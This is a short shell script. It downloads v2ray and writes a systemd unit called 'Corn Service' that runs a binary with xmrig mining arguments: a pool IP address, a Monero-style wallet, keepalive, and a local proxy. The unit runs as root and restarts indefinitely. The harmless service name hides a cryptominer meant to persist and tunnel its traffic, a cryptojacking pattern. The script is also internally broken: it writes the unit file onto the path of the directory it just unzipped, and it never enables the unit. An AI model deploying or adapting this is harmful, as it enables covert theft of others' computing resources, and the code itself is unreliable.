#!/bin/sh
cd ~/
wget https://github.com/v2fly/v2ray-core/releases/download/v4.31.0/v2ray-linux-64.zip
unzip v2ray-linux-64.zip -d v2ray
cd v2ray
chmod +x v2ray
cat > ~/v2ray<<EOL

[Unit]

Description=Corn Service

After=network.target



[Service]

WorkingDirectory=/home/corn

ExecStart=/home/corn/corn -o 114.29.237.94:3333 -u 43cx2hYimLw9YkAYxLG8Vg2TStTL3r6XmbfDfBiCY9MCViYCCaYpEzr1BUCmZTquQwLpg7Sb1FhrV4qR5EXWwvkgKdSHVLd -p x -k --proxy 127.0.0.1:1080 

Restart=always

RestartSec=10

KillSignal=SIGINT

SyslogIdentifier=xmrig

User=root



[Install]

WantedBy=multi-user.target

EOL
